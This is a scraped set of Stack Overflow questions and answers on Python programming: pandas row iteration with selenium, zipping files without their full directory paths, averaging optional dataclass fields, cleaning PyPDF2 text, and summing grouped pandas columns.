Q: Pandas for-loop with a list of columns I'm trying to open links in my dataframe using selenium webdriver, the dataframe 'df1' looks like this: user repo1 repo2 repo3 0 breed cs149-f22 kattis2canvas grpc-maven-skeleton 1 GrahamDumpleton mod_wsgi wrapt NaN The links I want to open include the content in column 'user' and one of 3 'repo' columns. I encounter a bug when I iterate the 'repo' columns. Could anyone help me out? Thank you! Here is my best try: repo_cols = [col for col in df1.columns if 'repo' in col] for index, row in df1.iterrows(): user = row['user'] for repo_name in repo_cols: try: repo = row['repo_name'] current_url = f'https://github.com/{user}/{repo}/graphs/contributors' driver.get(current_url) time.sleep(0.5) except: pass Here is the bug I encounter: KeyError: 'repo_name' --------------------------------------------------------------------------- KeyError Traceback (most recent call last) ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3079 try: -> 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() KeyError: 'repo_name' The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) <ipython-input-50-eb068230c3fd> in <module> 4 user = row['user'] 5 for repo_name in repo_cols: ----> 6 repo = row['repo_name'] 7 current_url = f'https://github.com/{user}/{repo}/graphs/contributors' 8 driver.get(current_url) ~\anaconda3\lib\site-packages\pandas\core\series.py in __getitem__(self, key) 851 852 elif key_is_scalar: --> 853 return self._get_value(key) 854 855 if is_hashable(key): ~\anaconda3\lib\site-packages\pandas\core\series.py in _get_value(self, label, takeable) 959 960 # Similar to Index.get_value, but we do not fall back to positional --> 961 loc = self.index.get_loc(label) 962 return self.index._get_values_for_loc(self, loc, label) 963 ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: -> 3082 raise KeyError(key) from err 3083 3084 if tolerance is not None: KeyError: 'repo_name' A: You're getting the KeyError because there is no column named repro_name. You need to replace row['repo_name'] with row[repo_name]. Try this : import pandas as pd from selenium import webdriver df1= pd.DataFrame({'user': ['breed', 'GrahamDumpleton'], 'repo1': ['cs149-f22', 'mod_wsgi'], 'repo2': ['kattis2canvas', 'wrapt']}) repo_cols = [col for col in df1.columns if 'repo' in col] for index, row in df1.iterrows(): user = row['user'] for repo_name in repo_cols: try: repo = row[repo_name] browser=webdriver.Chrome() current_url = f'https://github.com/{user}/{repo}/graphs/contributors' browser.get(current_url) time.sleep(0.5) except: pass A: I think you should remove the quotation mark on the: repo = row['repo_name'] It should be: repo = row[repo_name]
Pandas for-loop with a list of columns
I'm trying to open links in my dataframe using selenium webdriver, the dataframe 'df1' looks like this: user repo1 repo2 repo3 0 breed cs149-f22 kattis2canvas grpc-maven-skeleton 1 GrahamDumpleton mod_wsgi wrapt NaN The links I want to open include the content in column 'user' and one of 3 'repo' columns. I encounter a bug when I iterate the 'repo' columns. Could anyone help me out? Thank you! Here is my best try: repo_cols = [col for col in df1.columns if 'repo' in col] for index, row in df1.iterrows(): user = row['user'] for repo_name in repo_cols: try: repo = row['repo_name'] current_url = f'https://github.com/{user}/{repo}/graphs/contributors' driver.get(current_url) time.sleep(0.5) except: pass Here is the bug I encounter: KeyError: 'repo_name' --------------------------------------------------------------------------- KeyError Traceback (most recent call last) ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3079 try: -> 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\index.pyx in pandas._libs.index.IndexEngine.get_loc() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() pandas\_libs\hashtable_class_helper.pxi in pandas._libs.hashtable.PyObjectHashTable.get_item() KeyError: 'repo_name' The above exception was the direct cause of the following exception: KeyError Traceback (most recent call last) <ipython-input-50-eb068230c3fd> in <module> 4 user = row['user'] 5 for repo_name in repo_cols: ----> 6 repo = row['repo_name'] 7 current_url = f'https://github.com/{user}/{repo}/graphs/contributors' 8 driver.get(current_url) ~\anaconda3\lib\site-packages\pandas\core\series.py in __getitem__(self, key) 851 852 elif key_is_scalar: --> 853 return self._get_value(key) 854 855 if is_hashable(key): ~\anaconda3\lib\site-packages\pandas\core\series.py in _get_value(self, label, takeable) 959 960 # Similar to Index.get_value, but we do not fall back to positional --> 961 loc = self.index.get_loc(label) 962 return self.index._get_values_for_loc(self, loc, label) 963 ~\anaconda3\lib\site-packages\pandas\core\indexes\base.py in get_loc(self, key, method, tolerance) 3080 return self._engine.get_loc(casted_key) 3081 except KeyError as err: -> 3082 raise KeyError(key) from err 3083 3084 if tolerance is not None: KeyError: 'repo_name'
[ "You're getting the KeyError because there is no column named repro_name.\nYou need to replace row['repo_name'] with row[repo_name].\nTry this :\nimport pandas as pd\nfrom selenium import webdriver\n\ndf1= pd.DataFrame({'user': ['breed', 'GrahamDumpleton'],\n 'repo1': ['cs149-f22', 'mod_wsgi'],\n 'repo2': ['kattis2canvas', 'wrapt']})\n\nrepo_cols = [col for col in df1.columns if 'repo' in col]\n\nfor index, row in df1.iterrows():\n user = row['user']\n for repo_name in repo_cols:\n try:\n repo = row[repo_name]\n browser=webdriver.Chrome()\n current_url = f'https://github.com/{user}/{repo}/graphs/contributors'\n browser.get(current_url)\n time.sleep(0.5)\n except:\n pass\n\n", "I think you should remove the quotation mark on the:\n\nrepo = row['repo_name']\n\nIt should be:\n\nrepo = row[repo_name]\n\n" ]
[ 0, 0 ]
[]
[]
[ "for_loop", "pandas", "python", "selenium_webdriver" ]
stackoverflow_0074592293_for_loop_pandas_python_selenium_webdriver.txt
Q: zip file and avoid directory structure I have a Python script that zips a file (new.txt): tofile = "/root/files/result/"+file targetzipfile = new.zip # This is how I want my zip to look like zf = zipfile.ZipFile(targetzipfile, mode='w') try: #adding to archive zf.write(tofile) finally: zf.close() When I do this I get the zip file. But when I try to unzip the file I get the text file inside of a series of directories corresponding to the path of the file i.e I see a folder called root in the result directory and more directories within it, i.e. I have /root/files/result/new.zip and when I unzip new.zip I have a directory structure that looks like /root/files/result/root/files/result/new.txt Is there a way I can zip such that when I unzip I only get new.txt? In other words I have /root/files/result/new.zip and when I unzip new.zip, it should look like /root/files/results/new.txt A: The zipfile.write() method takes an optional arcname argument that specifies what the name of the file should be inside the zipfile I think you need to do a modification for the destination, otherwise it will duplicate the directory. Use :arcname to avoid it. try like this: import os import zipfile def zip(src, dst): zf = zipfile.ZipFile("%s.zip" % (dst), "w", zipfile.ZIP_DEFLATED) abs_src = os.path.abspath(src) for dirname, subdirs, files in os.walk(src): for filename in files: absname = os.path.abspath(os.path.join(dirname, filename)) arcname = absname[len(abs_src) + 1:] print 'zipping %s as %s' % (os.path.join(dirname, filename), arcname) zf.write(absname, arcname) zf.close() zip("src", "dst") A: zf.write(tofile) to change zf.write(tofile, zipfile_dir) for example zf.write("/root/files/result/root/files/result/new.txt", "/root/files/results/new.txt") A: To illustrate most clearly, directory structure: /Users └── /user . ├── /pixmaps . │ ├── pixmap_00.raw . │ ├── pixmap_01.raw │ ├── /jpeg │ │ ├── pixmap_00.jpg │ │ └── pixmap_01.jpg │ └── /png │ ├── pixmap_00.png │ └── pixmap_01.png ├── /docs ├── /programs ├── /misc . . . Directory of interest: /Users/user/pixmaps First attemp import os import zipfile TARGET_DIRECTORY = "/Users/user/pixmaps" ZIPFILE_NAME = "CompressedDir.zip" def zip_dir(directory, zipname): """ Compress a directory (ZIP file). """ if os.path.exists(directory): outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED) for dirpath, dirnames, filenames in os.walk(directory): for filename in filenames: filepath = os.path.join(dirpath, filename) outZipFile.write(filepath) outZipFile.close() if __name__ == '__main__': zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME) ZIP file structure: CompressedDir.zip . └── /Users └── /user └── /pixmaps ├── pixmap_00.raw ├── pixmap_01.raw ├── /jpeg │ ├── pixmap_00.jpg │ └── pixmap_01.jpg └── /png ├── pixmap_00.png └── pixmap_01.png Avoiding the full directory path def zip_dir(directory, zipname): """ Compress a directory (ZIP file). """ if os.path.exists(directory): outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED) # The root directory within the ZIP file. rootdir = os.path.basename(directory) for dirpath, dirnames, filenames in os.walk(directory): for filename in filenames: # Write the file named filename to the archive, # giving it the archive name 'arcname'. filepath = os.path.join(dirpath, filename) parentpath = os.path.relpath(filepath, directory) arcname = os.path.join(rootdir, parentpath) outZipFile.write(filepath, arcname) outZipFile.close() if __name__ == '__main__': zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME) ZIP file structure: CompressedDir.zip . └── /pixmaps ├── pixmap_00.raw ├── pixmap_01.raw ├── /jpeg │ ├── pixmap_00.jpg │ └── pixmap_01.jpg └── /png ├── pixmap_00.png └── pixmap_01.png A: The arcname parameter in the write method specifies what will be the name of the file inside the zipfile: import os import zipfile # 1. Create a zip file which we will write files to zip_file = "/home/username/test.zip" zipf = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) # 2. Write files found in "/home/username/files/" to the test.zip files_to_zip = "/home/username/files/" for file_to_zip in os.listdir(files_to_zip): file_to_zip_full_path = os.path.join(files_to_zip, file_to_zip) # arcname argument specifies what will be the name of the file inside the zipfile zipf.write(filename=file_to_zip_full_path, arcname=file_to_zip) zipf.close() A: Check out the documentation for Zipfile.write. ZipFile.write(filename[, arcname[, compress_type]]) Write the file named filename to the archive, giving it the archive name arcname (by default, this will be the same as filename, but without a drive letter and with leading path separators removed) https://docs.python.org/2/library/zipfile.html#zipfile.ZipFile.write Try the following: import zipfile import os filename = 'foo.txt' # Using os.path.join is better than using '/' it is OS agnostic path = os.path.join(os.path.sep, 'tmp', 'bar', 'baz', filename) zip_filename = os.path.splitext(filename)[0] + '.zip' zip_path = os.path.join(os.path.dirname(path), zip_filename) # If you need exception handling wrap this in a try/except block with zipfile.ZipFile(zip_path, 'w') as zf: zf.write(path, zip_filename) The bottom line is that if you do not supply an archive name then the filename is used as the archive name and it will contain the full path to the file. A: You can isolate just the file name of your sources files using: name_file_only= name_full_path.split(os.sep)[-1] For example, if name_full_path is /root/files/results/myfile.txt, then name_file_only will be myfile.txt. To zip myfile.txt to the root of the archive zf, you can then use: zf.write(name_full_path, name_file_only) A: It is much simpler than expected, I configured the module using the parameter "arcname" as "file_to_be_zipped.txt", so the folders do not appear in my final zipped file: mmpk_zip_file = zipfile.ZipFile("c:\\Destination_folder_name\newzippedfilename.zip", mode='w', compression=zipfile.ZIP_DEFLATED) mmpk_zip_file.write("c:\\Source_folder_name\file_to_be_zipped.txt", "file_to_be_zipped.txt") mmpk_zip_file.close() A: We can use this import os # single File os.system(f"cd {destinationFolder} && zip fname.zip fname") # directory os.system(f"cd {destinationFolder} && zip -r folder.zip folder") For me, This is working. A: Specify the arcname input of the write method as following: tofile = "/root/files/result/"+file NewRoot = "files/result/" zf.write(tofile, arcname=tofile.split(NewRoot)[1]) More info: ZipFile.write(filename, arcname=None, compress_type=None, compresslevel=None) https://docs.python.org/3/library/zipfile.html A: I face the same problem and i solve it with writestr. You can use it like this: zipObject.writestr(<filename> , <file data, bytes or string>) A: If you want an elegant way to do it with pathlib you can use it this way: from pathlib import Path import zipfile def zip_dir(path_to_zip: Path): zip_file = Path(path_to_zip).with_suffix('.zip') z = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) for f in list(path_to_zip.rglob('*.*')): z.write(f, arcname=f.relative_to(path_to_zip)) A: To get rid of the absolute path, I came up with this: def create_zip(root_path, file_name, ignored=[], storage_path=None): """Create a ZIP This function creates a ZIP file of the provided root path. Args: root_path (str): Root path to start from when picking files and directories. file_name (str): File name to save the created ZIP file as. ignored (list): A list of files and/or directories that you want to ignore. This selection is applied in root directory only. storage_path: If provided, ZIP file will be placed in this location. If None, the ZIP will be created in root_path """ if storage_path is not None: zip_root = os.path.join(storage_path, file_name) else: zip_root = os.path.join(root_path, file_name) zipf = zipfile.ZipFile(zip_root, 'w', zipfile.ZIP_DEFLATED) def iter_subtree(path, layer=0): # iter the directory path = Path(path) for p in path.iterdir(): if layer == 0 and p.name in ignored: continue zipf.write(p, str(p).replace(root_path, '').lstrip('/')) if p.is_dir(): iter_subtree(p, layer=layer+1) iter_subtree(root_path) zipf.close() Maybe it isn't the most elegant solution, but this works. If we just use p.name when providing the file name to write() method, then it doesn't create the proper directory structure. Moreover, if it's needed to ignore the selected directories or files from the root path, this ignores those selections too. A: This is an example I used. I have one excel file, Treport where I am using python + pandas in my dowork function to create pivot tables, etc. for each of the companies in CompanyNames. I create a zip file of the csv and a non-zip file so I can check as well. The writer specifies the path where I want my .xlsx to go and for my zip files, I specify that in the zip.write(). I just specify the name of the xlsx file that was recently created, and that is what gets zipped up, not the whole directory. Beforehand I was just specifying 'writer' and would zip up the whole directory. This allows me to zip up just the recently created excel file. Treport = 'TestReportData.csv' CompanyNames = ['Company1','Company2','Company3'] for CompName in CompanyNames: strcomp = str(CompName) #Writer Creates pathway to output report to. Each company gets unique file. writer = pd.ExcelWriter(f"C:\\Users\\MyUser\\Documents\\{strcomp}addReview.xlsx", engine='xlsxwriter') DoWorkFunction(CompName, Treport, writer) writer.save() with ZipFile(f"C:\\Users\\MyUser\\Documents\\{strcomp}addR.zip", 'w') as zip: zip.write(writer, f"{strcomp}addReview.xlsx")
zip file and avoid directory structure
I have a Python script that zips a file (new.txt): tofile = "/root/files/result/"+file targetzipfile = new.zip # This is how I want my zip to look like zf = zipfile.ZipFile(targetzipfile, mode='w') try: #adding to archive zf.write(tofile) finally: zf.close() When I do this I get the zip file. But when I try to unzip the file I get the text file inside of a series of directories corresponding to the path of the file i.e I see a folder called root in the result directory and more directories within it, i.e. I have /root/files/result/new.zip and when I unzip new.zip I have a directory structure that looks like /root/files/result/root/files/result/new.txt Is there a way I can zip such that when I unzip I only get new.txt? In other words I have /root/files/result/new.zip and when I unzip new.zip, it should look like /root/files/results/new.txt
[ "The zipfile.write() method takes an optional arcname argument that specifies what the name of the file should be inside the zipfile\nI think you need to do a modification for the destination, otherwise it will duplicate the directory. Use :arcname to avoid it. try like this:\nimport os\nimport zipfile\n\ndef zip(src, dst):\n zf = zipfile.ZipFile(\"%s.zip\" % (dst), \"w\", zipfile.ZIP_DEFLATED)\n abs_src = os.path.abspath(src)\n for dirname, subdirs, files in os.walk(src):\n for filename in files:\n absname = os.path.abspath(os.path.join(dirname, filename))\n arcname = absname[len(abs_src) + 1:]\n print 'zipping %s as %s' % (os.path.join(dirname, filename),\n arcname)\n zf.write(absname, arcname)\n zf.close()\n\nzip(\"src\", \"dst\")\n\n", "zf.write(tofile)\n\nto change\nzf.write(tofile, zipfile_dir)\n\nfor example\nzf.write(\"/root/files/result/root/files/result/new.txt\", \"/root/files/results/new.txt\")\n\n", "To illustrate most clearly,\ndirectory structure:\n/Users\n └── /user\n . ├── /pixmaps\n . │ ├── pixmap_00.raw\n . │ ├── pixmap_01.raw\n │ ├── /jpeg\n │ │ ├── pixmap_00.jpg\n │ │ └── pixmap_01.jpg\n │ └── /png\n │ ├── pixmap_00.png\n │ └── pixmap_01.png\n ├── /docs\n ├── /programs\n ├── /misc\n .\n .\n .\n\nDirectory of interest: /Users/user/pixmaps\nFirst attemp\nimport os\nimport zipfile\n\nTARGET_DIRECTORY = \"/Users/user/pixmaps\"\nZIPFILE_NAME = \"CompressedDir.zip\"\n\ndef zip_dir(directory, zipname):\n \"\"\"\n Compress a directory (ZIP file).\n \"\"\"\n if os.path.exists(directory):\n outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)\n\n for dirpath, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n\n filepath = os.path.join(dirpath, filename)\n outZipFile.write(filepath)\n\n outZipFile.close()\n\n\n\n\nif __name__ == '__main__':\n zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME)\n\nZIP file structure:\nCompressedDir.zip\n.\n└── /Users\n └── /user\n └── /pixmaps\n ├── pixmap_00.raw\n ├── pixmap_01.raw\n ├── /jpeg\n │ ├── pixmap_00.jpg\n │ └── pixmap_01.jpg\n └── /png\n ├── pixmap_00.png\n └── pixmap_01.png\n\nAvoiding the full directory path\ndef zip_dir(directory, zipname):\n \"\"\"\n Compress a directory (ZIP file).\n \"\"\"\n if os.path.exists(directory):\n outZipFile = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)\n\n # The root directory within the ZIP file.\n rootdir = os.path.basename(directory)\n\n for dirpath, dirnames, filenames in os.walk(directory):\n for filename in filenames:\n\n # Write the file named filename to the archive,\n # giving it the archive name 'arcname'.\n filepath = os.path.join(dirpath, filename)\n parentpath = os.path.relpath(filepath, directory)\n arcname = os.path.join(rootdir, parentpath)\n\n outZipFile.write(filepath, arcname)\n\n outZipFile.close()\n\n\n\n\nif __name__ == '__main__':\n zip_dir(TARGET_DIRECTORY, ZIPFILE_NAME)\n\nZIP file structure:\nCompressedDir.zip\n.\n└── /pixmaps\n ├── pixmap_00.raw\n ├── pixmap_01.raw\n ├── /jpeg\n │ ├── pixmap_00.jpg\n │ └── pixmap_01.jpg\n └── /png\n ├── pixmap_00.png\n └── pixmap_01.png\n\n", "The arcname parameter in the write method specifies what will be the name of the file inside the zipfile:\nimport os\nimport zipfile\n\n# 1. Create a zip file which we will write files to\nzip_file = \"/home/username/test.zip\"\nzipf = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED)\n\n# 2. Write files found in \"/home/username/files/\" to the test.zip\nfiles_to_zip = \"/home/username/files/\"\nfor file_to_zip in os.listdir(files_to_zip):\n\n file_to_zip_full_path = os.path.join(files_to_zip, file_to_zip)\n\n # arcname argument specifies what will be the name of the file inside the zipfile\n zipf.write(filename=file_to_zip_full_path, arcname=file_to_zip)\n\nzipf.close()\n\n", "Check out the documentation for Zipfile.write.\n\nZipFile.write(filename[, arcname[, compress_type]]) Write the file\n named filename to the archive, giving it the archive name arcname (by\n default, this will be the same as filename, but without a drive letter\n and with leading path separators removed)\n\nhttps://docs.python.org/2/library/zipfile.html#zipfile.ZipFile.write\nTry the following:\nimport zipfile\nimport os\nfilename = 'foo.txt'\n\n# Using os.path.join is better than using '/' it is OS agnostic\npath = os.path.join(os.path.sep, 'tmp', 'bar', 'baz', filename)\nzip_filename = os.path.splitext(filename)[0] + '.zip'\nzip_path = os.path.join(os.path.dirname(path), zip_filename)\n\n# If you need exception handling wrap this in a try/except block\nwith zipfile.ZipFile(zip_path, 'w') as zf:\n zf.write(path, zip_filename)\n\nThe bottom line is that if you do not supply an archive name then the filename is used as the archive name and it will contain the full path to the file.\n", "You can isolate just the file name of your sources files using:\nname_file_only= name_full_path.split(os.sep)[-1]\n\nFor example, if name_full_path is /root/files/results/myfile.txt, then name_file_only will be myfile.txt. To zip myfile.txt to the root of the archive zf, you can then use:\nzf.write(name_full_path, name_file_only)\n\n", "It is much simpler than expected, I configured the module using the parameter \"arcname\" as \"file_to_be_zipped.txt\", so the folders do not appear in my final zipped file:\nmmpk_zip_file = zipfile.ZipFile(\"c:\\\\Destination_folder_name\\newzippedfilename.zip\", mode='w', compression=zipfile.ZIP_DEFLATED)\nmmpk_zip_file.write(\"c:\\\\Source_folder_name\\file_to_be_zipped.txt\", \"file_to_be_zipped.txt\")\nmmpk_zip_file.close()\n\n", "We can use this\nimport os\n# single File\nos.system(f\"cd {destinationFolder} && zip fname.zip fname\") \n# directory\nos.system(f\"cd {destinationFolder} && zip -r folder.zip folder\") \n\nFor me, This is working.\n", "Specify the arcname input of the write method as following:\ntofile = \"/root/files/result/\"+file\nNewRoot = \"files/result/\"\nzf.write(tofile, arcname=tofile.split(NewRoot)[1])\n\nMore info:\n\nZipFile.write(filename, arcname=None, compress_type=None,\ncompresslevel=None)\nhttps://docs.python.org/3/library/zipfile.html\n\n", "I face the same problem and i solve it with writestr. You can use it like this:\nzipObject.writestr(<filename> , <file data, bytes or string>)\n", "If you want an elegant way to do it with pathlib you can use it this way:\nfrom pathlib import Path\nimport zipfile\n\ndef zip_dir(path_to_zip: Path):\n zip_file = Path(path_to_zip).with_suffix('.zip')\n z = zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED)\n for f in list(path_to_zip.rglob('*.*')):\n z.write(f, arcname=f.relative_to(path_to_zip))\n\n", "To get rid of the absolute path, I came up with this:\ndef create_zip(root_path, file_name, ignored=[], storage_path=None):\n \"\"\"Create a ZIP\n \n This function creates a ZIP file of the provided root path.\n \n Args:\n root_path (str): Root path to start from when picking files and directories.\n file_name (str): File name to save the created ZIP file as.\n ignored (list): A list of files and/or directories that you want to ignore. This\n selection is applied in root directory only.\n storage_path: If provided, ZIP file will be placed in this location. If None, the\n ZIP will be created in root_path\n \"\"\"\n if storage_path is not None:\n zip_root = os.path.join(storage_path, file_name)\n else:\n zip_root = os.path.join(root_path, file_name)\n \n zipf = zipfile.ZipFile(zip_root, 'w', zipfile.ZIP_DEFLATED)\n def iter_subtree(path, layer=0):\n # iter the directory\n path = Path(path)\n for p in path.iterdir():\n if layer == 0 and p.name in ignored:\n continue\n zipf.write(p, str(p).replace(root_path, '').lstrip('/'))\n \n if p.is_dir():\n iter_subtree(p, layer=layer+1)\n\n iter_subtree(root_path)\n zipf.close()\n\nMaybe it isn't the most elegant solution, but this works. If we just use p.name when providing the file name to write() method, then it doesn't create the proper directory structure.\nMoreover, if it's needed to ignore the selected directories or files from the root path, this ignores those selections too.\n", "This is an example I used. I have one excel file, Treport where I am using python + pandas in my dowork function to create pivot tables, etc. for each of the companies in CompanyNames. I create a zip file of the csv and a non-zip file so I can check as well.\nThe writer specifies the path where I want my .xlsx to go and for my zip files, I specify that in the zip.write(). I just specify the name of the xlsx file that was recently created, and that is what gets zipped up, not the whole directory. Beforehand I was just specifying 'writer' and would zip up the whole directory. This allows me to zip up just the recently created excel file.\nTreport = 'TestReportData.csv'\nCompanyNames = ['Company1','Company2','Company3']\nfor CompName in CompanyNames:\n strcomp = str(CompName)\n #Writer Creates pathway to output report to. Each company gets unique file.\n writer = pd.ExcelWriter(f\"C:\\\\Users\\\\MyUser\\\\Documents\\\\{strcomp}addReview.xlsx\", engine='xlsxwriter')\n DoWorkFunction(CompName, Treport, writer)\n writer.save()\n with ZipFile(f\"C:\\\\Users\\\\MyUser\\\\Documents\\\\{strcomp}addR.zip\", 'w') as zip:\n zip.write(writer, f\"{strcomp}addReview.xlsx\")\n\n" ]
[ 79, 20, 14, 9, 6, 6, 4, 2, 1, 0, 0, 0, 0 ]
[]
[]
[ "python", "zip" ]
stackoverflow_0027991745_python_zip.txt
Q: Don't use empty/none variables in method/class I have a class that looks something like: @dataclass class MyClass: df1: pd.Series = None df2: pd.Series = None df3: pd.Series = None df4: pd.Series = None df5: pd.Series = None @property def series_mean(self) -> pd.Series: series_mean = ( self.df1 + self.df2 + self.df3 + self.df4 + self.df5 ).mean() return series_mean Generally this could just be done as a function alone, but for this case, let's just assume I do this. Now, my issue now is, that none of the df's are mandatory, so I could just give it df1 and df5. In that case, the mean doesn't work due to the None in the class. So how do I go about just using the ones that are not None ? And on top of that, is there a way to get how many of them are not None? I mean, if I wanted to do / 2 instead of .mean() if there is two that are not None. A: Put them in a tuple instead and filter on None. Then you can easily both sum and and query len from the filtered tuple. from typing import Tuple @dataclass class MyClass: dfs: Tuple[pd.Series, pd.Series, pd.Series, pd.Series, pd.Series] = (None, None, None, None, None) @property def series_mean(self) -> pd.Series: not_none = tuple(filter(None, self.dfs)) return sum(not_none) / len(not_none) A: Assuming you actually need to keep this as five separate variables, which I doubt, you can use sum with a generator expression to filter out the none values @property def series_mean(self) -> pd.Series: return sum( df for df in [self.df1, self.df2, self.df3, self.df4, self.df5] if df is not None).mean
Don't use empty/none variables in method/class
I have a class that looks something like: @dataclass class MyClass: df1: pd.Series = None df2: pd.Series = None df3: pd.Series = None df4: pd.Series = None df5: pd.Series = None @property def series_mean(self) -> pd.Series: series_mean = ( self.df1 + self.df2 + self.df3 + self.df4 + self.df5 ).mean() return series_mean Generally this could just be done as a function alone, but for this case, let's just assume I do this. Now, my issue now is, that none of the df's are mandatory, so I could just give it df1 and df5. In that case, the mean doesn't work due to the None in the class. So how do I go about just using the ones that are not None ? And on top of that, is there a way to get how many of them are not None? I mean, if I wanted to do / 2 instead of .mean() if there is two that are not None.
[ "Put them in a tuple instead and filter on None. Then you can easily both sum and and query len from the filtered tuple.\nfrom typing import Tuple\n\n@dataclass\nclass MyClass:\n dfs: Tuple[pd.Series, pd.Series, pd.Series, pd.Series, pd.Series] = (None, None, None, None, None)\n\n @property\n def series_mean(self) -> pd.Series: \n not_none = tuple(filter(None, self.dfs))\n return sum(not_none) / len(not_none)\n\n", "Assuming you actually need to keep this as five separate variables, which I doubt, you can use sum with a generator expression to filter out the none values\n@property\ndef series_mean(self) -> pd.Series:\n return sum(\n df for df in \n [self.df1, self.df2, self.df3, self.df4, self.df5]\n if df is not None).mean\n\n" ]
[ 0, 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592371_python.txt
Q: bytes representation to string object while read with PyPDF2 I read some PDF files and unfortunately, I am using only PyPDF2. with open(filename1, 'rb') as pdfFileObj: # creating a pdf reader object pdfReader = PyPDF2.PdfFileReader(pdfFileObj) print(pdfReader.numPages) pageObj = pdfReader.getPage(0) gg = pageObj.extractText() print(gg) #<- first print shows text type(gg) # <- str gg #<- second print shows bytes as string eg. '\x00K\x00o\x00n\x00t\x00o\x00a\x00u\x00s\x00z\x00ü\x00g\x00e\n\x00S\x00L\x00' My issue is that gg is not bytes but a string representation of the bytes so I cannot decode into text. How can I access the printed str or convert the bytes representation to text so I can work with some regex? A: A solution would be to replace all \x00 with "" by using re.sub('\x00','',gg) so I have only the text. If there is another more efficient way, I would like to have a look.
bytes representation to string object while read with PyPDF2
I read some PDF files and unfortunately, I am using only PyPDF2. with open(filename1, 'rb') as pdfFileObj: # creating a pdf reader object pdfReader = PyPDF2.PdfFileReader(pdfFileObj) print(pdfReader.numPages) pageObj = pdfReader.getPage(0) gg = pageObj.extractText() print(gg) #<- first print shows text type(gg) # <- str gg #<- second print shows bytes as string eg. '\x00K\x00o\x00n\x00t\x00o\x00a\x00u\x00s\x00z\x00ü\x00g\x00e\n\x00S\x00L\x00' My issue is that gg is not bytes but a string representation of the bytes so I cannot decode into text. How can I access the printed str or convert the bytes representation to text so I can work with some regex?
[ "A solution would be to replace all \\x00 with \"\" by using re.sub('\\x00','',gg) so I have only the text. If there is another more efficient way, I would like to have a look.\n" ]
[ 0 ]
[]
[]
[ "pypdf2", "python" ]
stackoverflow_0074592019_pypdf2_python.txt
Q: Adding Multiple Columns in Single groupby in Pandas Dataset image Please help, I have a dataset in which I have columns Country, Gas and Year from 2019 to 1991. Also attaching the snapshot of the dataset. I want to answer a question that I want to add all the values of a country column wise? For example, for Afghanistan, value should come 56.4 under 2019 (adding 28.79 + 6.23 + 16.37 + 5.01 = 56.4). Now I want it should calculate the result for every year. I have used below code for achieving 2019 data. df.groupby(by='Country')['2019'].sum() This is the output of that code: Country --------------------- Afghanistan 56.40 Albania 17.31 Algeria 558.67 Andorra 1.18 Angola 256.10 ... Venezuela 588.72 Vietnam 868.40 Yemen 50.05 Zambia 182.08 Zimbabwe 235.06 I have group the data country wise and adding the 2019 column values, but how should I add values of other years in single line of code? Please help. I can do the code shown here, to add rows and show multiple columns like this but this will be tedious task to do so write each column name. df.groupby(by='Country')[['2019','2018','2017']].sum() A: If you don't specify the column, it will sum all the numeric column. df.groupby(by='Country').sum() 2019 2020 ... Country Afghanistan 56.40 32.4 ... Albania 17.31 12.5 ... Algeria 558.67 241.5 ... Andorra 1.18 1.5 ... Angola 256.10 32.1 ... ... ... ... Venezuela 588.72 247.3 ... Vietnam 868.40 323.5 ... Yemen 50.05 55.7 ... Zambia 182.08 23.4 ... Zimbabwe 235.06 199.4 ... Do a reset_index() to flatten the columns df.groupby(by='Country').sum().reset_index() Country 2020 2019 ... Afghanistan 56.40 32.4 ... Albania 17.31 12.5 ... Algeria 558.67 241.5 ... Andorra 1.18 1.5 ... Angola 256.10 32.1 ... ... ... ... Venezuela 588.72 247.3 ... Vietnam 868.40 323.5 ... Yemen 50.05 55.7 ... Zambia 182.08 23.4 ... Zimbabwe 235.06 199.4 ... A: You can select columns keys in your dataframe starting from column 2019 till the last column key in this way: df.groupby(by='Country')[df.keys()[2:]].sum() Method df.keys will return all dataframe columns keys in a list then you can slice it from the index of 2019 key which is 2 till end of columns keys. Suppose you want to select columns from 2016 till 1992 column: df.groupby(by='Country')[df.keys()[5:-1]].sum() you just need to slice the list of columns keys in correct index order.
Adding Multiple Columns in Single groupby in Pandas
